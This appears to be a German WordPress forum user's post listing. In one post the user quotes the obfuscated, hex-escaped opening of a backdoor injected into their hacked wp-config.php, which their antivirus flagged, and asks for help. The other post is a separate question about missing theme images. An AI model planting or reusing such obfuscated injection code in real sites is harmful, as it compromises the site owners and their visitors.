Beiträge von sigiberlin

    Hi

    in meiner wp-config.php findeich am Anfang dieses:

    Zitat

    <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php

    Der eigentliche Code ist wesentlich länger, aber mein Avast hat beim Speichern dieses Texte eine Backdoor erkannt....

    Offensichtlich ist diese Webseite gehacked worden.

    Ist dazu irgendwas bekannt? Mein provider hat erstmal alles gesperrt so daß da nix mehr passieren soll.

    Interessant wäre auch, ob bekannt ist, ob weitere .php-Dateien in der Installation betroffen sein könnten...

    das error.log sagt sowas:

    Hi

    heute morgen geh ich auf meine Seite sigiberlin.de und sehe keine Graphiken, nur noch reinen Text. Im Adminbereich sieht es besser aus, allerdings ist bei der Theme-Auswahl kein Vorschaubild zu sehen.

    Im Quelltext der Seite wird das richtige Theme referenziert:

    Code
    <meta name="generator" content="WordPress 3.9.1" /> <!-- leave this for stats -->
    <link rel="stylesheet" href="[URL="http://forum.wpde.org/view-source:http://sigiberlin.de/wp-content/themes/statement/style.css"]http://sigiberlin.de/wp-content/themes/statement/style.css[/URL]" type="text/css" media="screen" />
    <link rel="stylesheet" href="[URL="http://forum.wpde.org/view-source:http://sigiberlin.de/wp-content/themes/statement/tab.css"]http://sigiberlin.de/wp-content/themes/statement/tab.css[/URL]" type="text/css" media="screen" />
    <script type="text/javascript" src="[URL="http://forum.wpde.org/view-source:http://sigiberlin.de/wp-content/themes/statement/tabber.js"]http://sigiberlin.de/wp-content/themes/statement/tabber.js[/URL]"></script>

    was ist das denn ?

    Edit: sehe grade, daß das bei einer anderen Seite auf dem selben Server auch ist. Könnte also am Server (Strato, root, ubuntu) liegenb - aber woran genau?

    Edit 2: wenn ich z.B. http://sigiberlin.de/wp-content/the…/screenshot.png im Browser eingebe, wird die Datei nicht gefunden - die ist aber da, ich seh sie im FTP...